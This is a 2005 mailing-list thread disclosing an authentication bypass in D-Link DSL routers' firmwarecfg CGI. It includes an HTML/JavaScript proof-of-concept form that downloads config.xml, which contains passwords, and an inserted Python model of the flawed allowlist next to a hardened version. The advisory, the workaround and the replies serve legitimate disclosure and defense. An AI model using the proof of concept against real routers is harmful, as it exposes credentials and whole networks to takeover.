Discussion:
D-Link DSL routers authentication bypass
Francesco Orro
2005-05-19 14:41:56 UTC
====================== SUMMARY ========================

          Title: D-Link DSL routers authentication bypass
           Date: 19 May 2005
         Author: Francesco Orro <francesco.orro 4t akhela.com>

        Product: DSL-502T, DSL-504T, DSL-562T, DSL-G604T
         Vendor: D-Link
     Vendor URL: http://www.dlink.com
  Vendor Status: D-Link was contacted
        Affects: Tested on DSL-502T, DSL-504T, DSL-562T, DSL-G604T with
                 various firmware versions
           Risk: High
         Impact: Unauthorized people may gain full access to the device

Vulnerability Description: an undocumented feature allows (in some
cases) bypassing the authentication prompt and gaining full access to the
router, and then to the network behind it.


====================== BACKGROUND ========================

D-Link DSL routers are commonly used for internet connectivity for home
or small office needs. (http://www.dlink.com/products/)


=============== PROBLEM DESCRIPTION ==================

The CGI /cgi-bin/firmwarecfg, when executed, checks the existence of the
file fw_ip under /var/tmp/. If this file exists, all IP addresses listed
inside it are given straight access to the device, without the need for
authentication. If this file doesn't exist, the CGI creates a new one,
putting the requesting address inside.

If the web configuration console is accessible from the internet and if
nobody has ever called the CGI before (e.g. from a workstation inside
the LAN), then everybody can gain access to the router, download the
config.xml file, which contains user accounts and passwords, gain access
to the private network, modify or alter the firmware of the router, etc.


================ ADDITIONAL DETAILS ==================

Vulnerability was found on the following firmware versions:

V1.00B01T16.EN.20040211
V1.00B01T16.EU.20040217
V0.00B01T04.UK.20040220
V1.00B01T16.EN.20040226
V1.00B02T02.EU.20040610
V1.00B02T02.UK.20040618
V1.00B02T02.EU.20040729
V1.00B02T02.DE.20040813
V1.00B02T02.RU.20041014

It can be exploited by a simple HTTP POST, using the form below:

<html>
<head><title>GetConfig - Config file download</title></head>
<body>

<script type="text/javascript">
function invia_richiesta()
{
        document.DownloadConfig.action='http://'+document.InputBox.Host.value+'/cgi-bin/firmwarecfg';
        document.DownloadConfig.submit();
}
</script>

Download config.xml:
<form name="InputBox">
<br>http://<input name="Host" type="text" value="">/cgi-bin/firmwarecfg<br>
</form>
<form name="DownloadConfig" method="POST" action=""
enctype="multipart/form-data">
          <input type="Submit" name="config" value="Download"
onClick="invia_richiesta();"><br>
</form>

</body>
</html>


=================== FIX INFORMATION ===================

At present there is no solution to the problem, since it seems to be a
hidden feature.
The workaround is to call the CGI /cgi-bin/firmwarecfg from a known
address on the local network and/or to disable web console access from
the internet.


================ AUTHOR INFORMATION ================

Francesco Orro
Akhela S.r.l. - Operation Group
http://www.akhela.com/

EMail: francesco.orro 4t akhela.com
KeyID: 6CF46D45


=================== DISCLOSURE HISTORY =====================

2 May 2005 - First private release of this advisory;
4 May 2005 - The vendor (D-Link Mediterraneo S.r.l.) has been informed
             of the vulnerability;
5 May 2005 - The vendor replied that the problem was resolved on
             firmware version V1.00B02T02.EU.20040610, but it has been
             demonstrated that this version is vulnerable too;
19 May 2005 - Public release of this advisory.
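A model of the access rule described in the advisory, added here as an example (it is not the firmware's code nor the author's): the first unauthenticated caller seeds the /var/tmp/fw_ip allowlist, the advisory's workaround pre-seeds it from a LAN address, and an assumed hardened rule refuses to enrol anyone who has not authenticated. Router, the 192.168.1.0/24 LAN range and firmwarecfg_hardened are assumptions made for illustration.

```python
import ipaddress
from typing import List, Optional
# Constructed model, not D-Link code: only the fw_ip semantics come from the advisory.


class Router:
    """fw_ip models /var/tmp/fw_ip; None means the file does not exist yet."""

    def __init__(self, lan: str = "192.168.1.0/24") -> None:
        self.fw_ip: Optional[List[str]] = None
        self.lan = ipaddress.ip_network(lan)  # assumed LAN range


def firmwarecfg_as_described(router: Router, client_ip: str) -> bool:
    """Access rule from the advisory: every address in fw_ip is trusted without
    authentication, and a missing file is created holding the requester."""
    if router.fw_ip is None:
        router.fw_ip = [client_ip]  # first caller, wherever it is, enrols itself
        return True
    return client_ip in router.fw_ip


def firmwarecfg_hardened(router: Router, client_ip: str, authenticated: bool) -> bool:
    """Assumed fix: enrol only after a successful login and only LAN addresses,
    so an unauthenticated Internet caller can never seed the allowlist."""
    if not authenticated or ipaddress.ip_address(client_ip) not in router.lan:
        return False
    if router.fw_ip is None:
        router.fw_ip = []
    if client_ip not in router.fw_ip:
        router.fw_ip.append(client_ip)
    return True


def demo() -> tuple:
    remote = "203.0.113.7"  # constructed Internet-side address (TEST-NET-3)
    # 1. Exposed device, CGI never called: the first remote caller gets in.
    remote_first = firmwarecfg_as_described(Router(), remote)
    # 2. Advisory workaround: a LAN admin calls the CGI once, so fw_ip exists
    #    before the remote caller arrives and does not contain its address.
    seeded = Router()
    firmwarecfg_as_described(seeded, "192.168.1.10")
    remote_after_workaround = firmwarecfg_as_described(seeded, remote)
    # 3. Hardened logic refuses the same remote caller regardless of fw_ip.
    hardened_remote = firmwarecfg_hardened(Router(), remote, authenticated=False)
    return remote_first, remote_after_workaround, hardened_remote


if __name__ == "__main__":
    print(demo())  # (True, False, False)
```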
Luis Peralta
2005-05-20 10:22:19 UTC
Hi,

I notified D-Link (***@dlink.es) about this issue (I only checked
it on G604T models) on April 11th. The bug does not only allow to
download the configuration file, but to completely trojanize the
device by means of custom firmware uploading. I gave D-Link a two
month grace period to fix the issue.

Regards,
--
Luis Peralta
http://spisa.act.uji.es/~peralta
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Francesco Orro
2005-05-20 10:51:58 UTC
I found this vulnerability for my job last March. I immediately tried to
contact D-Link, since I didn't trust the e-mail for ordinary technical
support. At the beginning of May I managed to submit the vulnerability to
D-Link and I received the answer you find in the advisory.

Bye
Francesco Orro
Sebastian von Knorring
2005-05-20 14:05:03 UTC
Hello.


Could the D-Link DI-604 story at

<http://groups-beta.google.com/group/sci.astro.seti/msg/71095063e414a3e2>

be related to this vulnerability?

I myself also have a DI-604 that broke down in exactly the same way as described
above, and the above was the only similar case I have found on the net so far.

My suspicion was also that the box had been hacked and your vulnerability post
now shows that exploitable holes in D-Link boxes exist.


-Sebastian
